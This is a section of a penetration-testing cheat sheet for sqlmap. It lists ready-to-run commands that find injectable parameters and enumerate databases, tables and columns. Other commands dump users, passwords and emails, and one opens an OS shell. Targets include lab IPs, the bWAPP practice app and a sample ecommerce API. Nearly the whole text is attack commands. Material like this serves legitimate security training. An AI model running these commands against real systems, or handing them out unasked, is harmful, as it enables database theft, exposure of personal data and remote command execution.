4.3.6 SQLMap
sqlmap -r <REQUEST_FILE> -p <POST_PARAMETER>
sqlmap -r Post.req
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" #POST Method

Get database if injection exists
sqlmap -r login.req --dbs
sqlmap -u "http://10.10.10.10/file.php?id=1" --dbs #determine the databases:
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id --dbs #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" --dbs #POST Method
# List databases
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title --dbs
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP --tables
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users --columns
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users -C admin,password,email --dump

Get Tables in a Database
sqlmap -r login.req -D dbname --tables #determine the tables:
sqlmap -u "http://10.10.10.10/file.php?id=1" -D dbname --common-tables #if tables not available, guess tables using common names
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname --tables #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname --tables #POST Method

Get data from Database tables
sqlmap -r login.req -D dbname -T table_name --dump
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname -T table_name --dump #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname -T table_name --dump #POST Method

Get OS-Shell
sqlmap -u "http://10.10.10.10/file.php?id=1" --os-shell

Example of usage
Dumping emails from a table
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users -C email --dump

Common parameters
-u: The vulnerable URL.
-p: The parameter you suspect is injectable.
--dbms=mysql: You know the backend DBMS is MySQL.
--level=5 --risk=3: Enables deeper and riskier tests.
--technique=EUBT: Restricts the type of SQLi techniques used (Error, Union, Boolean, Time-based).
-D ecommerce: Targeting the ecommerce database.
-T users: Looking into the users table.
-C email: Only extracting the email column.
--dump: Actually retrieves the data.

Listing columns of a table
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users --columns

Dumping usernames
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users -C username --dump

Listing columns of the users table again (can be used for planning further dumps)
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users --columns

Enumerating tables with specific prefix/suffix
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
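--technique=EUBT --current-db --prefix="ecom_" --suffix="_log" --tables
Note: in sqlmap, --prefix and --suffix set the strings placed before and after each injection payload; they do not filter table names.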